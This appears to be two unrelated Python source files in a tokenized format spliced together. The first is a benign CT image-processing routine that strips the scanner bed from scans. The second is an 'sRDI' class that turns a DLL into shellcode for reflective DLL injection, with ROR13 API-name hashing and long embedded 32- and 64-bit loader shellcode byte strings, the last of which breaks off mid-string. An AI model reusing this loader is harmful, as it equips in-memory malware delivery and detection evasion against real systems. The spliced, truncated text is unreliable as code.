"""<line_sep>fixed_min=fixed_image.image.min()<line_sep>moving_min=moving_image.image.min()<line_sep>min_val=min(fixed_min moving_min)<line_sep>fixed_image.image<augsub>min_val<line_sep>moving_image.image<augsub>min_val<line_sep>moving_max=moving_image.image.max()<line_sep>fixed_max=fixed_image.image.max()<line_sep>max_val=max(fixed_max moving_max)<line_sep>fixed_image.image<augdiv>max_val<line_sep>moving_image.image<augdiv>max_val<line_sep><return>(fixed_image moving_image)<block_end><def_stmt>remove_bed_filter image cropping=<true><block_start>"""
Removes fine structures from the image using morphological operators. It can be used to remove the bed structure
usually present in CT images. The resulting image and the respective body mask can be cropped with the cropping
option.
Note: the morphological operations are performed on a downsampled version of the image
image (Image): image of interest
cropping (bool): specifies if the image should be cropped after bed removal
return (Image, Image): bed-free image and a body mask
"""<line_sep># define parameters
houndsfield_min=-300<line_sep>houndsfield_max=3071<line_sep>houndsfield_default=-1024<line_sep>radius_opening=3<line_sep>radius_closing=40<line_sep>image_itk=image.itk()<line_sep># resample image
workingSize=np.array(image.size)<line_sep>workingSize[0]<augdiv>3<line_sep>workingSize[1]<augdiv>3<line_sep>workingSpacing=np.array(image.spacing dtype=float)<times>np.array(image.size dtype=float)/np.array(workingSize dtype=float)<line_sep>resampler=sitk.ResampleImageFilter()<line_sep>resampler.SetOutputOrigin(image.origin)<line_sep>resampler.SetSize(workingSize.tolist())<line_sep>resampler.SetOutputSpacing(workingSpacing.tolist())<line_sep>resampler.SetInterpolator(2)# linear interpolation
resampler.SetNumberOfThreads(mp.cpu_count())<line_sep>image_tmp=resampler.Execute(image_itk)<line_sep># threshold image
thresholder=sitk.BinaryThresholdImageFilter()<line_sep>thresholder.SetOutsideValue(0)<line_sep>thresholder.SetInsideValue(1)<line_sep>thresholder.SetLowerThreshold(houndsfield_min)<line_sep>thresholder.SetUpperThreshold(houndsfield_max)<line_sep>thresholder.SetNumberOfThreads(mp.cpu_count())<line_sep>image_tmp=thresholder.Execute(image_tmp)<line_sep># morphological opening with ball as structuring element
# removes thin structures as the bed
opening=sitk.BinaryMorphologicalOpeningImageFilter()<line_sep>opening.SetKernelType(sitk.sitkBall)<line_sep>opening.SetKernelRadius(radius_opening)<line_sep>opening.SetForegroundValue(1)<line_sep>opening.SetNumberOfThreads(mp.cpu_count())<line_sep>image_tmp=opening.Execute(image_tmp)<line_sep># crop zero values from mask boundary
<if_stmt>cropping<block_start>image_tmp=auto_crop_image_filter(Image(image_tmp).to(device=image.device)).itk()<block_end># morphological closing with ball as structuring element
# fills up the lungs
closing=sitk.BinaryMorphologicalClosingImageFilter()<line_sep>closing.SetKernelRadius(sitk.sitkBall)<line_sep>closing.SetKernelRadius(radius_closing)<line_sep>closing.SetForegroundValue(1)<line_sep>closing.SetNumberOfThreads(mp.cpu_count())<line_sep>image_tmp=closing.Execute(image_tmp)<line_sep># resample mask to original spacing
mask_size=np.array(np.array(image_tmp.GetSpacing() dtype=float)<times>np.array(image_tmp.GetSize() dtype=float)/np.array(image.spacing dtype=float) dtype=int).tolist()<line_sep>resampler=sitk.ResampleImageFilter()<line_sep>resampler.SetOutputOrigin(image_tmp.GetOrigin())<line_sep>resampler.SetSize(mask_size)<line_sep>resampler.SetOutputSpacing(image.spacing)<line_sep>resampler.SetInterpolator(1)# nearest neighbor interpolation
resampler.SetNumberOfThreads(mp.cpu_count())<line_sep>bodyMask=resampler.Execute(image_tmp)<line_sep># resample also original image
resampler.SetInterpolator(2)<line_sep>image_itk=resampler.Execute(image_itk)<line_sep># mask image with found label map
masking=sitk.MaskImageFilter()<line_sep>masking.SetMaskingValue(0)<line_sep>masking.SetOutsideValue(houndsfield_default)<line_sep>masking.SetNumberOfThreads(mp.cpu_count())<line_sep>outImage=masking.Execute(image_itk bodyMask)<line_sep><return>(Image(outImage).to(device=image.device) Image(bodyMask).to(device=image.device))<block_end> |
<import_stmt>base64<import_stmt>struct<import_from_stmt>converters.Transformer Transformer<class_stmt>sRDI(Transformer)<block_start>MACHINE_IA64=512<line_sep>MACHINE_AMD64=34404<def_stmt>__init__ self<block_start>super().__init__()<line_sep>self.flags=0|0x1|0x4|30<lshift>16<line_sep>self.function="DllMain"<line_sep>self.args=b"test"<line_sep>self.filetype="dll"<block_end>@staticmethod<def_stmt>is64BitDLL _bytes<block_start>header_offset=struct.unpack("<L" _bytes[60:64])[0]<line_sep>machine=struct.unpack("<H" _bytes[header_offset+4:header_offset+4+2])[0]<if_stmt>machine<eq>sRDI.MACHINE_IA64<or>machine<eq>sRDI.MACHINE_AMD64<block_start><return><true><block_end><return><false><block_end>@staticmethod<def_stmt>ror val r_bits max_bits<block_start><return>((val&(2<power>max_bits-1))<rshift>r_bits%max_bits)|(val<lshift>(max_bits-(r_bits%max_bits))&(2<power>max_bits-1))<block_end>@staticmethod<def_stmt>HashFunctionName name module=<none><block_start>function=name.encode()+b'\x00'<if_stmt>module<block_start>module=module.upper().encode('UTF-16LE')+b'\x00\x00'<line_sep>function_hash=0<for_stmt>b function<block_start>function_hash=sRDI.ror(function_hash 13 32)<line_sep>function_hash<augadd>b<block_end>module_hash=0<for_stmt>b module<block_start>module_hash=sRDI.ror(module_hash 13 32)<line_sep>module_hash<augadd>b<block_end>function_hash<augadd>module_hash<if_stmt>function_hash<g>0xFFFFFFFF<block_start>function_hash<augsub>0x100000000<block_end><block_end><else_stmt><block_start>function_hash=0<for_stmt>b function<block_start>function_hash=sRDI.ror(function_hash 13 32)<line_sep>function_hash<augadd>b<block_end><block_end><return>function_hash<block_end>@staticmethod<def_stmt>ConvertToShellcode dll_bytes function_hash=0x10 user_data=b'None' flags=0# MARKER:S
<block_start>rdi_shellcode32=b'\x81\xEC\x14\x01\x00\x00\x53\x55\x56\x57\x6A\x6B\x58\x6A\x65\x66\x89\x84\x24\xCC\x00\x00'<concat>b'\x00\x33\xED\x58\x6A\x72\x59\x6A\x6E\x5B\x6A\x6C\x5A\x6A\x33\x66\x89\x84\x24\xCE\x00\x00'<concat>b'\x00\x66\x89\x84\x24\xD4\x00\x00\x00\x58\x6A\x32\x66\x89\x84\x24\xD8\x00\x00\x00\x58\x6A'<concat>b'\x2E\x66\x89\x84\x24\xDA\x00\x00\x00\x58\x6A\x64\x66\x89\x84\x24\xDC\x00\x00\x00\x58\x89'<concat>b'\xAC\x24\xB0\x00\x00\x00\x89\x6C\x24\x34\x89\xAC\x24\xB8\x00\x00\x00\x89\xAC\x24\xC4\x00'<concat>b'\x00\x00\x89\xAC\x24\xB4\x00\x00\x00\x89\xAC\x24\xAC\x00\x00\x00\x89\xAC\x24\xE0\x00\x00'<concat>b'\x00\x66\x89\x8C\x24\xCC\x00\x00\x00\x66\x89\x9C\x24\xCE\x00\x00\x00\x66\x89\x94\x24\xD2'<concat>b'\x00\x00\x00\x66\x89\x84\x24\xDA\x00\x00\x00\x66\x89\x94\x24\xDC\x00\x00\x00\x66\x89\x94'<concat>b'\x24\xDE\x00\x00\x00\xC6\x44\x24\x3C\x53\x88\x54\x24\x3D\x66\xC7\x44\x24\x3E\x65\x65\xC6'<concat>b'\x44\x24\x40\x70\x66\xC7\x44\x24\x50\x4C\x6F\xC6\x44\x24\x52\x61\x88\x44\x24\x53\x66\xC7'<concat>b'\x44\x24\x54\x4C\x69\xC6\x44\x24\x56\x62\x88\x4C\x24\x57\xC6\x44\x24\x58\x61\x88\x4C\x24'<concat>b'\x59\x66\xC7\x44\x24\x5A\x79\x41\x66\xC7\x44\x24\x44\x56\x69\x88\x4C\x24\x46\x66\xC7\x44'<concat>b'\x24\x47\x74\x75\xC6\x44\x24\x49\x61\x88\x54\x24\x4A\xC6\x44\x24\x4B\x41\x88\x54\x24\x4C'<concat>b'\x88\x54\x24\x4D\x66\xC7\x44\x24\x4E\x6F\x63\x66\xC7\x44\x24\x5C\x56\x69\x88\x4C\x24\x5E'<concat>b'\x66\xC7\x44\x24\x5F\x74\x75\xC6\x44\x24\x61\x61\x88\x54\x24\x62\xC6\x44\x24\x63\x50\x88'<concat>b'\x4C\x24\x64\xC7\x44\x24\x65\x6F\x74\x65\x63\xC6\x44\x24\x69\x74\xC6\x84\x24\x94\x00\x00'<concat>b'\x00\x46\x88\x94\x24\x95\x00\x00\x00\xC7\x84\x24\x96\x00\x00\x00\x75\x73\x68\x49\x88\x9C'<concat>b'\x24\x9A\x00\x00\x00\x66\xC7\x84\x24\x9B\x00\x00\x00\x73\x74\x88\x8C\x24\x9D\x00\x00\x00'<concat>b'\xC7\x84\x24\x9E\x00\x00\x00\x75\x63\x74\x69\xC6\x84\x24\xA2\x00\x00\x00\x6F\x6A\x65\x59'<concat>b'\x88\x8C\x24\xA8\x00\x00\x00\x88\x4C\x24\x6D\x88\x4C\x24\x74\x88\x4C\x24\x79\x88\x8C\x24'<concat>b'\x92\x00\x00\x00\xB9\x13\x9C\xBF\xBD\x88\x9C\x24\xA3\x00\x00\x00\xC7\x84\x24\xA4\x00\x00'<concat>b'\x00\x43\x61\x63\x68\xC6\x44\x24\x6C\x47\xC7\x44\x24\x6E\x74\x4E\x61\x74\x66\xC7\x44\x24'<concat>b'\x72\x69\x76\xC7\x44\x24\x75\x53\x79\x73\x74\x66\xC7\x44\x24\x7A\x6D\x49\x88\x5C\x24\x7C'<concat>b'\x66\xC7\x44\x24\x7D\x66\x6F\x66\xC7\x84\x24\x80\x00\x00\x00\x52\x74\x88\x94\x24\x82\x00'<concat>b'\x00\x00\xC6\x84\x24\x83\x00\x00\x00\x41\x88\x84\x24\x84\x00\x00\x00\x88\x84\x24\x85\x00'<concat>b'\x00\x00\x66\xC7\x84\x24\x86\x00\x00\x00\x46\x75\x88\x9C\x24\x88\x00\x00\x00\xC7\x84\x24'<concat>b'\x89\x00\x00\x00\x63\x74\x69\x6F\x88\x9C\x24\x8D\x00\x00\x00\x66\xC7\x84\x24\x8E\x00\x00'<concat>b'\x00\x54\x61\xC6\x84\x24\x90\x00\x00\x00\x62\x88\x94\x24\x91\x00\x00\x00\xE8\x77\x08\x00'<concat>b'\x00\xB9\xB5\x41\xD9\x5E\x8B\xF0\xE8\x6B\x08\x00\x00\x8B\xD8\x8D\x84\x24\xC8\x00\x00\x00'<concat>b'\x6A\x18\x89\x84\x24\xEC\x00\x00\x00\x58\x66\x89\x84\x24\xE6\x00\x00\x00\x66\x89\x84\x24'<concat>b'\xE4\x00\x00\x00\x8D\x44\x24\x1C\x50\x8D\x84\x24\xE8\x00\x00\x00\x89\x5C\x24\x34\x50\x55'<concat>b'\x55\xFF\xD6\x6A\x0C\x5F\x8D\x44\x24\x44\x66\x89\x7C\x24\x14\x89\x44\x24\x18\x8D\x44\x24'<concat>b'\x34\x50\x55\x8D\x44\x24\x1C\x66\x89\x7C\x24\x1E\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x0E\x58'<concat>b'\x66\x89\x44\x24\x14\x66\x89\x44\x24\x16\x8D\x44\x24\x5C\x89\x44\x24\x18\x8D\x84\x24\xB4'<concat>b'\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x15\x58\x66\x89\x44'<concat>b'\x24\x14\x66\x89\x44\x24\x16\x8D\x84\x24\x94\x00\x00\x00\x89\x44\x24\x18\x8D\x84\x24\xB8'<concat>b'\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x13\x5E\x8D\x44\x24'<concat>b'\x6C\x66\x89\x74\x24\x14\x89\x44\x24\x18\x8D\x84\x24\xC4\x00\x00\x00\x50\x55\x8D\x44\x24'<concat>b'\x1C\x66\x89\x74\x24\x1E\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x05\x58\x66\x89\x44\x24\x14\x66'<concat>b'\x89\x44\x24\x16\x8D\x44\x24\x3C\x89\x44\x24\x18\x8D\x84\x24\xAC\x00\x00\x00\x50\x55\x8D'<concat>b'\x44\x24\x1C\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x84\x24\x80\x00\x00\x00\x66\x89\x74\x24\x14'<concat>b'\x89\x44\x24\x18\x8D\x84\x24\xE0\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x66\x89\x74\x24\x1E'<concat>b'\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x44\x24\x50\x66\x89\x7C\x24\x14\x89\x44\x24\x18\x8D\x84'<concat>b'\x24\xB0\x00\x00\x00\x50\x55\x8D\x44\x24\x1C\x66\x89\x7C\x24\x1E\x50\xFF\x74\x24\x28\xFF'<concat>b'\xD3\x39\x6C\x24\x34\x0F\x84\x00\x07\x00\x00\x39\xAC\x24\xB4\x00\x00\x00\x0F\x84\xF3\x06'<concat>b'\x00\x00\x39\xAC\x24\xAC\x00\x00\x00\x0F\x84\xE6\x06\x00\x00\x39\xAC\x24\xB8\x00\x00\x00'<concat>b'\x0F\x84\xD9\x06\x00\x00\x8B\xAC\x24\xC4\x00\x00\x00\x85\xED\x0F\x84\xCA\x06\x00\x00\x8B'<concat>b'\xBC\x24\x28\x01\x00\x00\x8B\x77\x3C\x03\xF7\x81\x3E\x50\x45\x00\x00\x0F\x85\xB2\x06\x00'<concat>b'\x00\xB8\x4C\x01\x00\x00\x66\x39\x46\x04\x0F\x85\xA3\x06\x00\x00\xF6\x46\x38\x01\x0F\x85'<concat>b'\x99\x06\x00\x00\x0F\xB7\x4E\x14\x33\xDB\x0F\xB7\x56\x06\x83\xC1\x24\x85\xD2\x74\x1E\x03'<concat>b'\xCE\x83\x79\x04\x00\x8B\x46\x38\x0F\x45\x41\x04\x03\x01\x8D\x49\x28\x3B\xC3\x0F\x46\xC3'<concat>b'\x8B\xD8\x83\xEA\x01\x75\xE4\x8D\x84\x24\x00\x01\x00\x00\x50\xFF\xD5\x8B\x8C\x24\x04\x01'<concat>b'\x00\x00\x8D\x51\xFF\x8D\x69\xFF\xF7\xD2\x03\x6E\x50\x8D\x41\xFF\x03\xC3\x23\xEA\x23\xC2'<concat>b'\x3B\xE8\x0F\x85\x3D\x06\x00\x00\x6A\x04\x68\x00\x30\x00\x00\x55\xFF\x76\x34\xFF\x54\x24'<concat>b'\x44\x8B\xD8\x89\x5C\x24\x2C\x85\xDB\x75\x13\x6A\x04\x68\x00\x30\x00\x00\x55\x50\xFF\x54'<concat>b'\x24\x44\x8B\xD8\x89\x44\x24\x2C\xF6\x84\x24\x38\x01\x00\x00\x01\x74\x23\x8B\x47\x3C\x89'<concat>b'\x43\x3C\x8B\x4F\x3C\x3B\x4E\x54\x73\x2E\x8B\xEF\x8D\x14\x0B\x2B\xEB\x8A\x04\x2A\x41\x88'<concat>b'\x02\x42\x3B\x4E\x54\x72\xF4\xEB\x19\x33\xED\x39\x6E\x54\x76\x12\x8B\xD7\x8B\xCB\x2B\xD3'<concat>b'\x8A\x04\x11\x45\x88\x01\x41\x3B\x6E\x54\x72\xF4\x8B\x6B\x3C\x33\xC9\x03\xEB\x89\x4C\x24'<concat>b'\x10\x33\xC0\x89\x6C\x24\x28\x0F\xB7\x55\x14\x83\xC2\x28\x66\x3B\x45\x06\x73\x31\x03\xD5'<concat>b'\x33\xF6\x39\x32\x76\x19\x8B\x42\x04\x8B\x4A\xFC\x03\xC6\x03\xCB\x8A\x04\x38\x88\x04\x31'<concat>b'\x46\x3B\x32\x72\xEB\x8B\x4C\x24\x10\x0F\xB7\x45\x06\x41\x83\xC2\x28\x89\x4C\x24\x10\x3B'<concat>b'\xC8\x72\xD1\x8B\xC3\xC7\x84\x24\xBC\x00\x00\x00\x01\x00\x00\x00\x2B\x45\x34\x89\x44\x24'<concat>b'\x24\x0F\x84\xC4\x00\x00\x00\x83\xBD\xA4\x00\x00\x00\x00\x0F\x84\xB7\x00\x00\x00\x8B\xB5'<concat>b'\xA0\x00\x00\x00\x03\xF3\x83\x3E\x00\x0F\x84\xA6\x00\x00\x00\x6A\x02\x8B\xF8\x5D\x8D\x56'<concat>b'\x08\xEB\x75\x0F\xB7\x02\x89\x44\x24\x10\x0F\xB7\xC8\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x75'<concat>b'\x28\x8B\x16\x8B\x4C\x24\x10\x81\xE1\xFF\x0F\x00\x00\x89\x4C\x24\x10\x8D\x04\x1A\x8B\x0C'<concat>b'\x08\x8D\x04\x1A\x8B\x54\x24\x10\x03\xCF\x89\x0C\x10\x8B\x54\x24\x24\xEB\x37\x66\x83\xF8'<concat>b'\x03\x75\x0D\x81\xE1\xFF\x0F\x00\x00\x03\x0E\x01\x3C\x19\xEB\x24\x66\x3B\x84\x24\xBC\x00'<concat>b'\x00\x00\x75\x07\x8B\xC7\xC1\xE8\x10\xEB\x08\x66\x3B\xC5\x75\x0E\x0F\xB7\xC7\x81\xE1\xFF'<concat>b'\x0F\x00\x00\x03\x0E\x01\x04\x19\x03\xD5\x8B\x46\x04\x03\xC6\x89\x54\x24\x24\x3B\xD0\x0F'<concat>b'\x85\x7A\xFF\xFF\xFF\x83\x3A\x00\x8B\xF2\x0F\x85\x6A\xFF\xFF\xFF\x8B\x6C\x24\x28\x8B\xBC'<concat>b'\x24\x28\x01\x00\x00\x83\xBD\x84\x00\x00\x00\x00\x0F\x84\xD7\x01\x00\x00\x8B\xB5\x80\x00'<concat>b'\x00\x00\x33\xC0\x89\x44\x24\x10\x8D\x0C\x1E\x89\x4C\x24\x24\x83\xC1\x0C\x39\x01\x74\x0D'<concat>b'\x8D\x49\x14\x40\x83\x39\x00\x75\xF7\x89\x44\x24\x10\x8B\x8C\x24\x38\x01\x00\x00\x8B\xD1'<concat>b'\x83\xE2\x04\x89\x54\x24\x38\x8B\xD6\x0F\x84\xC3\x00\x00\x00\x83\xF8\x01\x0F\x86\xBA\x00'<concat>b'\x00\x00\x83\xA4\x24\xBC\x00\x00\x00\x00\xC1\xE9\x10\x89\x8C\x24\x38\x01\x00\x00\x8D\x48'<concat>b'\xFF\x89\x8C\x24\xC0\x00\x00\x00\x85\xC9\x0F\x84\xA1\x00\x00\x00\x8B\x74\x24\x24\x8B\xDE'<concat>b'\x8B\xAC\x24\xBC\x00\x00\x00\x8B\xC8\x69\xFF\xFD\x43\x03\x00\x2B\xCD\x33\xD2\xB8\xFF\x7F'<concat>b'\x00\x00\xF7\xF1\x81\xC7\xC3\x9E\x26\x00\x33\xD2\x89\xBC\x24\x28\x01\x00\x00\x6A\x05\x8D'<concat>b'\x48\x01\x8B\xC7\xC1\xE8\x10\x8D\xBC\x24\xF0\x00\x00\x00\x25\xFF\x7F\x00\x00\xF7\xF1\x59'<concat>b'\x03\xC5\x6B\xC0\x14\x6A\x05\x03\xC6\x45\x8B\xF0\xF3\xA5\x59\x8B\xF3\x8B\xF8\x8B\x44\x24'<concat>b'\x10\xF3\xA5\x6A\x05\x8B\xFB\x8D\xB4\x24\xF0\x00\x00\x00\x59\xF3\xA5\x8B\xBC\x24\x28\x01'<concat>b'\x00\x00\x83\xC3\x14\x8B\x74\x24\x24\x3B\xAC\x24\xC0\x00\x00\x00\x72\x87\x8B\x6C\x24\x28'<concat>b'\x8B\x5C\x24\x2C\x8B\x95\x80\x00\x00\x00\xEB\x0B\x8B\x44\x24\x38\x89\x84\x24\x38\x01\x00'<concat>b'\x00\x8D\x3C\x1A\x8B\x47\x0C\x89\x7C\x24\x2C\x85\xC0\x0F\x84\xB8\x00\x00\x00\x03\xC3\x50'<concat>b'\xFF\x94\x24\xB4\x00\x00\x00\x8B\xD0\x89\x54\x24\x1C\x8B\x37\x8B\x6F\x10\x03\xF3\x03\xEB'<concat>b'\x8B\x0E\x85\xC9\x74\x60\x8B\x7C\x24\x30\x85\xC9\x79\x09\x0F\xB7\x06\x55\x50\x6A\x00\xEB'<concat>b'\x36\x83\xC1\x02\x33\xC0\x03\xCB\x89\x8C\x24\xC0\x00\x00\x00\x38\x01\x74\x0E\x40\x41\x80'<concat>b'\x39\x00\x75\xF9\x8B\x8C\x24\xC0\x00\x00\x00\x55\x66\x89\x44\x24\x18\x66\x89\x44\x24\x1A'<concat>b'\x8D\x44\x24\x18\x6A\x00\x89\x4C\x24\x20\x50\x52\xFF\xD7\x83\xC6\x04\x83\xC5\x04\x8B\x0E'<concat>b'\x85\xC9\x74\x06\x8B\x54\x24\x1C\xEB\xA8\x8B\x7C\x24\x2C\x83\x7C\x24\x38\x00\x74\x1C\x33'<concat>b'\xC0\x40\x39\x44\x24\x10\x76\x13\x69\x84\x24\x38\x01\x00\x00\xE8\x03\x00\x00\x50\xFF\x94'<concat>b'\x24\xB0\x00\x00\x00\x8B\x47\x20\x83\xC7\x14\x89\x7C\x24\x2C\x85\xC0\x0F\x85\x4C\xFF\xFF'<concat>b'\xFF\x8B\x6C\x24\x28\x83\xBD\xE4\x00\x00\x00\x00\x0F\x84\xAD\x00\x00\x00\x8B\x85\xE0\x00'<concat>b'\x00\x00\x83\xC0\x04\x03\xC3\x89\x44\x24\x10\x8B\x00\x85\xC0\x0F\x84\x94\x00\x00\x00\x8B'<concat>b'\x6C\x24\x10\x03\xC3\x50\xFF\x94\x24\xB4\x00\x00\x00\x8B\xC8\x89\x4C\x24\x1C\x8B\x75\x08'<concat>b'\x8B\x7D\x0C\x03\xF3\x03\xFB\x83\x3E\x00\x74\x5B\x8B\x6C\x24\x30\x8B\x17\x85\xD2\x79\x09'<concat>b'\x56\x0F\xB7\xC2\x50\x6A\x00\xEB\x30\x83\xC2\x02\x33\xC0\x03\xD3\x89\x54\x24\x38\x38\x02'<concat>b'\x74\x0B\x40\x42\x80\x3A\x00\x75\xF9\x8B\x54\x24\x38\x56\x66\x89\x44\x24\x18\x66\x89\x44'<concat>b'\x24\x1A\x8D\x44\x24\x18\x6A\x00\x89\x54\x24\x20\x50\x51\xFF\xD5\x83\xC6\x04\x83\xC7\x04'<concat>b'\x83\x3E\x00\x74\x06\x8B\x4C\x24\x1C\xEB\xAD\x8B\x6C\x24\x10\x83\xC5\x20\x89\x6C\x24\x10'<concat>b'\x8B\x45\x00\x85\xC0\x0F\x85\x74\xFF\xFF\xFF\x8B\x6C\x24\x28\x0F\xB7\x75\x14\x33\xC0\x83'<concat>b'\xC6\x28\x33\xFF\x66\x3B\x45\x06\x0F\x83\xE5\x00\x00\x00\x03\xF5\xBA\x00\x00\x00\x40\x83'<concat>b'\x3E\x00\x0F\x84\xC5\x00\x00\x00\x8B\x4E\x14\x8B\xC1\x25\x00\x00\x00\x20\x75\x0B\x85\xCA'<concat>b'\x75\x07\x85\xC9\x78\x03\x40\xEB\x62\x85\xC0\x75\x30\x85\xCA\x75\x08\x85\xC9\x79\x04\x6A'<concat>b'\x08\xEB\x51\x85\xC0\x75\x20\x85\xCA\x74\x08\x85\xC9\x78\x04\x6A\x02\xEB\x41\x85\xC0\x75'<concat>b'\x10\x85\xCA\x74\x08\x85\xC9\x79\x04\x6A\x04\xEB\x31\x85\xC0\x74\x4A\x85\xCA\x75\x08\x85'<concat>b'\xC9\x78\x04\x6A\x10\xEB\x21\x85\xC0\x74\x3A\x85\xCA\x75\x0B\x85\xC9\x79\x07\xB8\x80\x00'<concat>b'\x00\x00\xEB\x0F\x85\xC0\x74\x27\x85\xCA\x74\x0D\x85\xC9\x78\x09\x6A\x20\x58\x89\x44\x24'<concat>b'\x20\xEB\x1A\x85\xC0\x74\x12\x85\xCA\x74\x0E\x8B\x44\x24\x20\x85\xC9\x6A\x40\x5A\x0F\x48'<concat>b'\xC2\xEB\xE4\x8B\x44\x24\x20\xF7\x46\x14\x00\x00\x00\x04\x74\x09\x0D\x00\x02\x00\x00\x89'<concat>b'\x44\x24\x20\x8D\x4C\x24\x20\x51\x50\x8B\x46\xFC\xFF\x36\x03\xC3\x50\xFF\x94\x24\xC4\x00'<concat>b'\x00\x00\xBA\x00\x00\x00\x40\x0F\xB7\x45\x06\x47\x83\xC6\x28\x3B\xF8\x0F\x82\x22\xFF\xFF'<concat>b'\xFF\x6A\x00\x6A\x00\x6A\xFF\xFF\x94\x24\xC4\x00\x00\x00\x83\xBD\xC4\x00\x00\x00\x00\x74'<concat>b'\x26\x8B\x85\xC0\x00\x00\x00\x8B\x74\x18\x0C\x8B\x06\x85\xC0\x74\x16\x33\xED\x45\x6A\x00'<concat>b'\x55\x53\xFF\xD0\x8D\x76\x04\x8B\x06\x85\xC0\x75\xF1\x8B\x6C\x24\x28\x33\xC0\x40\x50\x50'<concat>b'\x8B\x45\x28\x53\x03\xC3\xFF\xD0\x83\xBC\x24\x2C\x01\x00\x00\x00\x0F\x84\xAB\x00\x00\x00'<concat>b'\x83\x7D\x7C\x00\x0F\x84\xA1\x00\x00\x00\x8B\x55\x78\x03\xD3\x8B\x6A\x18\x85\xED\x0F\x84'<concat>b'\x91\x00\x00\x00\x83\x7A\x14\x00\x0F\x84\x87\x00\x00\x00\x8B\x7A\x20\x8B\x4A\x24\x03\xFB'<concat>b'\x83\x64\x24\x30\x00\x03\xCB\x85\xED\x74\x74\x8B\x37\xC7\x44\x24\x10\x00\x00\x00\x00\x03'<concat>b'\xF3\x74\x66\x8A\x06\x84\xC0\x74\x1A\x8B\x6C\x24\x10\x0F\xBE\xC0\x03\xE8\xC1\xCD\x0D\x46'<concat>b'\x8A\x06\x84\xC0\x75\xF1\x89\x6C\x24\x10\x8B\x6A\x18\x8B\x84\x24\x2C\x01\x00\x00\x3B\x44'<concat>b'\x24\x10\x75\x04\x85\xC9\x75\x15\x8B\x44\x24\x30\x83\xC7\x04\x40\x83\xC1\x02\x89\x44\x24'<concat>b'\x30\x3B\xC5\x72\xAE\xEB\x20\x0F\xB7\x09\x8B\x42\x1C\xFF\xB4\x24\x34\x01\x00\x00\xFF\xB4'<concat>b'\x24\x34\x01\x00\x00\x8D\x04\x88\x8B\x04\x18\x03\xC3\xFF\xD0\x59\x59\x8B\xC3\xEB\x02\x33'<concat>b'\xC0\x5F\x5E\x5D\x5B\x81\xC4\x14\x01\x00\x00\xC3\x83\xEC\x14\x64\xA1\x30\x00\x00\x00\x53'<concat>b'\x55\x56\x8B\x40\x0C\x57\x89\x4C\x24\x1C\x8B\x78\x0C\xE9\xA5\x00\x00\x00\x8B\x47\x30\x33'<concat>b'\xF6\x8B\x5F\x2C\x8B\x3F\x89\x44\x24\x10\x8B\x42\x3C\x89\x7C\x24\x14\x8B\x6C\x10\x78\x89'<concat>b'\x6C\x24\x18\x85\xED\x0F\x84\x80\x00\x00\x00\xC1\xEB\x10\x33\xC9\x85\xDB\x74\x2F\x8B\x7C'<concat>b'\x24\x10\x0F\xBE\x2C\x0F\xC1\xCE\x0D\x80\x3C\x0F\x61\x89\x6C\x24\x10\x7C\x09\x8B\xC5\x83'<concat>b'\xC0\xE0\x03\xF0\xEB\x04\x03\x74\x24\x10\x41\x3B\xCB\x72\xDD\x8B\x7C\x24\x14\x8B\x6C\x24'<concat>b'\x18\x8B\x44\x2A\x20\x33\xDB\x8B\x4C\x2A\x18\x03\xC2\x89\x4C\x24\x10\x85\xC9\x74\x34\x8B'<concat>b'\x38\x33\xED\x03\xFA\x83\xC0\x04\x89\x44\x24\x20\x8A\x0F\xC1\xCD\x0D\x0F\xBE\xC1\x03\xE8'<concat>b'\x47\x84\xC9\x75\xF1\x8B\x7C\x24\x14\x8D\x04\x2E\x3B\x44\x24\x1C\x74\x20\x8B\x44\x24\x20'<concat>b'\x43\x3B\x5C\x24\x10\x72\xCC\x8B\x57\x18\x85\xD2\x0F\x85\x50\xFF\xFF\xFF\x33\xC0\x5F\x5E'<concat>b'\x5D\x5B\x83\xC4\x14\xC3\x8B\x74\x24\x18\x8B\x44\x16\x24\x8D\x04\x58\x0F\xB7\x0C\x10\x8B'<concat>b'\x44\x16\x1C\x8D\x04\x88\x8B\x04\x10\x03\xC2\xEB\xDB '<line_sep>rdi_shellcode64=b'\x48\x8B\xC4\x48\x89\x58\x08\x44\x89\x48\x20\x4C\x89\x40\x18\x89\x50\x10\x55\x56\x57\x41'<concat>b'\x54\x41\x55\x41\x56\x41\x57\x48\x8D\x6C\x24\x90\x48\x81\xEC\x70\x01\x00\x00\x45\x33\xFF'<concat>b'\xC7\x45\xD8\x6B\x00\x65\x00\x48\x8B\xF1\x4C\x89\x7D\xF8\xB9\x13\x9C\xBF\xBD\x4C\x89\x7D'<concat>b'\xC8\x4C\x89\x7D\x08\x45\x8D\x4F\x65\x4C\x89\x7D\x10\x44\x88\x4D\xBC\x44\x88\x4D\xA2\x4C'<concat>b'\x89\x7D\x00\x4C\x89\x7D\xF0\x4C\x89\x7D\x18\x44\x89\x7D\x24\x44\x89\x7C\x24\x2C\xC7\x45'<concat>b'\xDC\x72\x00\x6E\x00\xC7\x45\xE0\x65\x00\x6C\x00\xC7\x45\xE4\x33\x00\x32\x00\xC7\x45\xE8'<concat>b'\x2E\x00\x64\x00\xC7\x45\xEC\x6C\x00\x6C\x00\xC7\x44\x24\x40\x53\x6C\x65\x65\xC6\x44\x24'<concat>b'\x44\x70\xC7\x44\x24\x58\x4C\x6F\x61\x64\xC7\x44\x24\x5C\x4C\x69\x62\x72\xC7\x44\x24\x60'<concat>b'\x61\x72\x79\x41\xC7\x44\x24\x48\x56\x69\x72\x74\xC7\x44\x24\x4C\x75\x61\x6C\x41\xC7\x44'<concat>b'\x24\x50\x6C\x6C\x6F\x63\xC7\x44\x24\x68\x56\x69\x72\x74\xC7\x44\x24\x6C\x75\x61\x6C\x50'<concat>b'\xC7\x44\x24\x70\x72\x6F\x74\x65\x66\xC7\x44\x24\x74\x63\x74\xC7\x45\xA8\x46\x6C\x75\x73'<concat>b'\xC7\x45\xAC\x68\x49\x6E\x73\xC7\x45\xB0\x74\x72\x75\x63\xC7\x45\xB4\x74\x69\x6F\x6E\xC7'<concat>b'\x45\xB8\x43\x61\x63\x68\xC7\x44\x24\x78\x47\x65\x74\x4E\xC7\x44\